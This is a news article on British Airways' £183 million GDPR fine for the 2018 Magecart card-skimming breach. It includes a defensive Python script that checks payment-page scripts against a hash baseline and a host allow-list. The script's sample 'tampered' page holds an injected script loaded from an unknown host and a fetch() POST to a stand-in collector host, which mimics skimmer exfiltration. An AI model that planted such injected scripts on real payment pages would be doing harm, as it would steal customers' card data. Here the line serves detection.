On Monday, the Information Commissioner’s Office announced that it has issued a fine of £183.39 million to British Airways under GDPR for failing to prevent a cyber incident last year that compromised personal and financial information of approximately 500,000 customers.
The staggering fine issued by the Information Commissioner’s Office dwarfs the 50 million euros (£44 million) fine issued by the French data protection commission to Google for failing to adhere to GDPR requirements while obtaining consent from users to process their personal data for delivering personalised advertisements.
British Airways hack affected half a million customers
In September last year, British Airways announced that it had suffered a cyber incident that compromised personal and financial information of customers who made bookings and changes on its official website between August 21 and September 5.
Initial reports suggested that the cyber incident compromised personal and financial information of around 380,000 customers whose login details, names, addresses, booking details, and payment card information were stolen by hackers from British Airways’ website. However, the airline confirmed that no passport or travel details were stolen.
“We are investigating, as a matter of urgency, the theft of customer data from our website and our mobile app. The stolen data did not include travel or passport details.
“We are deeply sorry for the disruption that this criminal activity has caused. We take the protection of our customers’ data very seriously. The breach has been resolved and our website is working normally. We have notified the police and relevant authorities,” it said.
In October, security firm RiskIQ revealed that the cyber incident involving British Airways was the work of a hacker group known as Magecart that specialised in covertly exporting personal and financial data of visitors to a website to a remote server.
According to RiskIQ, hackers from Magecart used only 22 lines of script to modify a large number of scripts on British Airways’ website and then exploited the modifications to extract information from payment forms and transfer that information to their own server. The hackers also used a unique infrastructure to carry out the attack and purposely targeted scripts that would blend in with normal payment processing to avoid detection.
“This attack is a simple but highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer which grabbed forms indiscriminately. This particular skimmer is very much attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site instead of blindly injecting the regular Magecart skimmer,” the firm added.
To avoid detection, hackers from Magecart not only used a server located in Romania and one belonging to a VPN provider named Time4VPS based in Lithuania, they also used a paid SSL certificate issued by Comodo rather than a free certificate to appear genuine.
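The defensive counterpart to the technique RiskIQ describes above is to notice when scripts on a payment page change or start talking to unfamiliar hosts. The following is an added example, not code from the article or from RiskIQ: it hashes each inline script against a known-good baseline and flags external script sources and URL literals that point outside an allow-list of hosts. The host names, page content and baseline are all constructed for the example.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed allow-list (hypothetical hosts) for script sources and data destinations.
ALLOWED_HOSTS = {"www.airline.example", "static.airline.example"}
# Regex extraction keeps the example short; a real monitor should use an HTML parser.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.S | re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)""", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_page(html, baseline_hashes, allowed_hosts):
    """Flag external scripts from non-allow-listed hosts, inline scripts whose
    SHA-256 is not in the baseline, and URL literals in inline code to other hosts."""
    findings = []
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:  # external script: check where it is loaded from
            host = urlparse(src.group(1)).hostname
            if host and host not in allowed_hosts:
                findings.append(("unknown-script-host", host))
            continue
        digest = sha256_hex(body)  # inline script: compare against baseline
        if digest not in baseline_hashes:
            findings.append(("unbaselined-inline-script", digest[:12]))
        for url in URL_RE.findall(body):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append(("external-endpoint-in-script", host))
    return findings


# Constructed sample pages: a known-good page and a copy with injected scripts.
GOOD_INLINE = 'window.paymentConfig = {currency: "GBP"};'
CLEAN_PAGE = ('<html><body><script src="https://static.airline.example/pay.js">'
              '</script><script>' + GOOD_INLINE + '</script></body></html>')
TAMPERED_PAGE = CLEAN_PAGE.replace("</body>", (
    '<script src="https://cdn.unknown.invalid/m.js"></script><script>'
    'fetch("https://collector.unknown.invalid/c", {method: "POST"});</script></body>'))
BASELINE = {sha256_hex(GOOD_INLINE)}

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, audit_page(page, BASELINE, ALLOWED_HOSTS))
```

In practice the baseline is rebuilt on every legitimate deployment, and the same check can be run against a headless browser's list of loaded resources so that scripts pulled in at runtime are covered too.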
ICO issues an unprecedented fine to BA
Following the announcement from British Airways, the Information Commissioner’s Office initiated a detailed investigation into the cyber incident that culminated in the watchdog issuing an unprecedented £183.39 million fine to the airline. However, the size of the fine could change after the airline makes representations to the ICO on the proposed findings and sanction.
“People’s personal data is just that – personal. When an organisation fails to protect it from loss, damage or theft it is more than an inconvenience. That’s why the law is clear – when you are entrusted with personal data you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights,” said Information Commissioner Elizabeth Denham.
“A fine of this magnitude can go a long way towards convincing companies to do everything they can to protect their customers’ private information. Too many companies continue to make the mistake of not investing enough in their cybersecurity programmes,” says Saryu Nayyar, CEO of Gurucul.
“They also continue to make the mistake of relying on the same conventional cybersecurity technologies that are continuously exploited during cyberattacks. These companies would be wise to look at new, automated approaches such as continuous monitoring of user and entity behaviours to discover anomalies as they occur,” she adds.
“The fine of £183 million by the ICO on British Airways under GDPR for the breach experienced by BA may represent a large fine, but with it comes a cautionary tale. Under GDPR, fines for breaches can reach 4% of the global revenue of an organisation. In the case of this fine, the ICO imposed a fine of 1.5% of 2017 revenue. In doing so the ICO joins CNIL with its fine on Google of 50 million Euro in stating that data privacy is serious business requiring serious attention,” says Tim Mackey, Principal Security Strategist at Synopsys CyRC.
“This then requires organisations to review precisely what their security procedures are – from development through deployment – and ensure that they can quantify the risks of any decisions to defer security improvements. These efforts range from secure development practices, up to date threat models, identification of dependency risks all the way through to penetration tests and comprehensive security audits,” he adds.